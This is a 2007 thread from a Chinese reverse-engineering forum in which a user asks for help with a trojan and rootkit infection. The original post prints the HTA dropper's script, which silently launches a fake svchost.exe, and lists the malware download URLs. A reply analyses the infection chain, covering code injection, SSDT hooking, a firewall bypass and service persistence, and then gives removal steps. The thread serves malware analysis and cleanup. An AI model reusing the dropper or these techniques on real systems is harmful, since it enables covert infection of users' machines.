首页
课程
问答
CTF
社区
招聘
峰会
发现
排行榜
知识库
工具下载
看雪20年
看雪商城
证书查询
登录
注册
首页
社区
课程
招聘
发现
问答
CTF
排行榜
知识库
工具下载
峰会
看雪商城
证书查询
社区
软件逆向
发新帖
1
0
[讨论]类似MY123性质的驱动木马.搞到最后,居然搞不顶.太牛了。
发表于: 2007-1-17 16:03
5045
[讨论]类似MY123性质的驱动木马.搞到最后,居然搞不顶.太牛了。
混世魔王
2
2007-1-17 16:03
5045
无意中了马.form这个网站
http://www.hk0909.com/
down下
http://ww1.tonji123.com/cjb.hta
http://ww1.tonji123.com/ps.exe
cjb.hta内容是
<html>
<HTA:APPLICATION ID=j3714 CAPTION="no" BORDER="none" HEIGHT="0" SHOWINTASKBAR="no" WIDTH="0">
<body>
<script language=javascript>
var f="c:\\svchost.exe";
try{
var w2s3h = new ActiveXObject("WScript.Shell")
w2s3h.Run(f,0,false);
window.close();
}
catch(e){}
</script>
</body>
</html>
会在system32 生成 q.exe 和mshta.exe 文件
还有一个名为 slc.sys 的驱动 ,隐藏了。找不到.用冰刃可以查到。居然无法删除.手工无语ing...
unlocker都不能运行。无余了。
无余,这个毒太牛了。
我用冰刃,把可疑文件都删除了。
居然还有,SSDT也检测不出来。
无语,
只好把
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
设置成只读.
用user帐号登陆.期待牛人分析。
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
上传的附件:
muma.rar
(1.85kb,4次下载)
收藏
・
1
免费
・
0
支持
分享
分享到微信
分享到QQ
分享到微博
赞赏记录
参与人
雪币
留言
时间
查看更多
赞赏
×
1 雪花
5 雪花
10 雪花
20 雪花
50 雪花
80 雪花
100 雪花
150 雪花
200 雪花
支付方式:
微信支付
赞赏留言:
快捷留言
感谢分享~
精品文章~
原创内容~
精彩转帖~
助人为乐~
感谢分享~
最新回复
(
5
)
混世魔王
雪 币:
245
活跃值:
(41)
能力值:
( LV7,RANK:110 )
在线值:
发帖
27
回帖
58
粉丝
0
关注
私信
混世魔王
2
2
楼
有个文件伪装成系统文件..郁闷.他驱动都日了.问题还存在.
怪不得,找不半天找不到原因。
DOWN 下来分析的朋友一定要注意.
建议从http://www.hk0909.com/ 主站抓包 下载木马原程序.可能提取不完全。
这个ps.exe 加的upack0.36 的壳.peid 好象查不出来。
slc.sys 是rootkit
2007-1-17 16:41
0
wangshq397
雪 币:
277
活跃值:
(312)
能力值:
( LV9,RANK:330 )
在线值:
发帖
59
回帖
650
粉丝
0
关注
私信
wangshq397
8
3
楼
用启动盘启动起来,删除
2007-1-18 09:04
0
ossurrond
雪 币:
201
活跃值:
(10)
能力值:
( LV2,RANK:10 )
在线值:
发帖
20
回帖
167
粉丝
0
关注
私信
ossurrond
4
楼
去安全模式.用PowerMV和.Sengr
2007-1-18 09:14
0
xyzreg
雪 币:
126
活跃值:
(61)
能力值:
( LV4,RANK:50 )
在线值:
发帖
1
回帖
46
粉丝
1
关注
私信
xyzreg
1
5
楼
稍微看了一下,呵呵,很垃圾的恶意程序,没啥特色,容易删除~ 简要分析如下:
ps.exe是一个用upack压缩过的下载者,代码注入到explorer.exe下载3个文件到c:\o.exe,c:\p.exe,c:\q.exe并执行。
c:\o.exe 执行后释放%systemroot%\system32\ctfcon.exe、%systemroot%\system32\tsdb.dll、%systemroot%\system32\DriveInterface.dll,%systemroot%\system32\slc.sys,并调用regsvr32.exe注册tsdb.dll,然后加载驱动文件slc.sys,接着删除DriveInterface.dll,接着再创建ctfcon进程。slc.sys挂接了SDT中的NtOpenKey以及NtSetInformationFile。slc.sys只对explorer.exe进程隐藏文件。
c:\p.exe 执行后释放%systemroot%\system32\cmes.exe,并以-Service参数运行cmes.exe,然后p.exe运行记事本并远程线程代码注入实现自删除。cmes.exe执行后将其自身安装名为DCOM Process Service的服务实现自启动,另外还释放%systemroot%\system32\itc.dll(文件设置为隐藏属性,但未使用rootkit技术隐藏) ,cmes.exe还远程线程将itc.dll注入到winlogon.exe进程中。
c:\q.exe 复制自己到系统根目录下,并且修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ 使其绕过XP SP2自带的防火墙,再创建名为
ServiceProvisioning的服务(DisplayName为Transaction Provisioning Service)使%systemroot%\system32\q.exe实现自启动。服务以及进程均没有隐藏。
恶意程序的流程分析完毕。c:\p.exe以及c:\q.exe均未使用rootkit
技术,c:\o.exe释放的slc.sys驱动也是小儿科,删除很容易。
简单说一下整个清理过程:终止进程ctfcon.exe、q.exe,删除那两个服务,执行regsvr32.exe /u C:\WINDOWS\system32\tsdb.dll,删除相关文件以及注册表项。删除itc.dll时可以先用IceSword卸载DLL再删除,不过防止winlogon崩溃,可以先重命名itc.dll重启后再删除(因为COW机制NT核心的平台下可以对正在运行的未以独占方式打开的文件进行重命名),或者使用IceSword 1.20的强制删除文件功能来直接删除文件。不过slc.sys在资源管理器中看不到,不过对于slc.sys还没到动用IceSword 1.20的地步,打开cmd,cd到系统根目录下,依次运行如下指令即可:ren slc.sys 123.sys ; del 123.sys 。 呵呵~
2007-1-18 13:00
0
混世魔王
雪 币:
245
活跃值:
(41)
能力值:
( LV7,RANK:110 )
在线值:
发帖
27
回帖
58
粉丝
0
关注
私信
混世魔王
2
6
楼
谢谢 xyzreg
开始以为ctfcon.exe 是正常进程。所以没找到问题的原因。
2007-1-18 14:30
0
游客
登录
|
注册
方可回帖
回帖
表情
雪币赚取及消费
高级回复
返回
混世魔王
2
27
发帖
58
回帖
110
RANK
关注
私信
他的文章
[求助]求分析一色狼专用泡妞约炮神器脱壳
5526
[原创]如何去除软件关闭后弹出的网页(配图)
20318
[原创]破解一个网络验证的.NET程序
47066
[讨论]类似MY123性质的驱动木马.搞到最后,居然搞不顶.太牛了。
5046
我的2003系统通不过windows盗版验证杂办..[已解决]
6550
关于我们
联系我们
企业服务
看雪公众号
专注于PC、移动、智能设备安全研究及逆向工程的开发者社区
谁下载
×
1119
angya
kman
uncia
看原图
赞赏
×
雪币:
+
留言:
快捷留言
为你点赞!
返回
顶部